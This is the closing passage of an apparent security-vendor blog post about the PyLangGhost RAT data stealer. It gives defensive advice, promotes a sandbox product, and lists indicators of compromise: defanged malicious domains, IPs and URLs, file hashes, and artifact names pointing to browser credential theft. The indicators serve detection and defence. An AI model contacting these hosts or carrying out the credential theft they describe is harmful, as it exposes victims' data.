    • Monitor for anomalous network traffic: Look for unusual outbound connections to raw IPs or rapid repeated HTTP requests from unexpected processes. 
    • Harden browser data security: Apply policies to clear cookies and credentials regularly, disable unneeded browser extensions, and enforce hardware-backed encryption where available. 
    • Incident response readiness: Maintain a process for rapid sandbox testing of suspicious files or scripts to shorten investigation times and reduce business impact. 

    Spot Similar Threats Early, Minimizing Business Risk 

    When facing dangerous malware like PyLangGhost RAT, speed of detection is important. Every minute an attacker remains undetected increases the chances of stolen data, financial loss, and operational disruption. 

    ANY.RUN’s Interactive Sandbox helps organizations identify and analyze threats like PyLangGhost RAT within minutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly emerging malware. 

    • Rapid incident response: Detect threats early to stop lateral movement, data exfiltration, and further compromise. 
    • Lower investigation costs: Automated analysis delivers verdicts quickly, reducing the time and resources needed for manual investigation. 
    • Faster, smarter decisions: Clear visualized execution flows help security teams assess impact and choose the right containment measures. 
    • Increased SOC efficiency: Streamlines detection, analysis, and reporting in one workflow, eliminating unnecessary manual steps. 
    • Proactive threat hunting: Flags stealthy or low-signature artifacts, enabling defenders to identify and block similar threats before they spread. 

    Early detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks. 

    Try ANY.RUN to see how it can strengthen your proactive defense 

    Gathered IOCs 

    Domain: 360scanner[.]store

    IPv4: 13[.]107.246[.]45

    IPv4: 151[.]243.101[.]229 

    URL: https[:]//360scanner[.]store/cam-v-b74si.fix

    URL: http[:]//151[.]243[.]101[.]229[:]8080/ 

    SHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7 

    SHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb 

    SHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45 

    SHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940 

    SHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f 

    FileName: chrome_logins_dump.txt FileName: gather.tar.gz Mutex:.store 

    Further Reading 

    https://otx.alienvault.com/pulse/688186afb933279c4be00337

    https://app.any.run/tasks/275e3573-0b3e-4e77-afaf-fe99b935c510 

    https://www.virustotal.com/gui/file/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940/detection 

    https://www.virustotal.com/gui/file/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1

    https://www.virustotal.com/gui/file/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb/community

    The post PyLangGhost RAT: Rising Data Stealer from Lazarus Group Targeting Finance and Technology  appeared first on ANY.RUN’s Cybersecurity Blog.

    ANY.RUN’s Cybersecurity Blog – ​Read More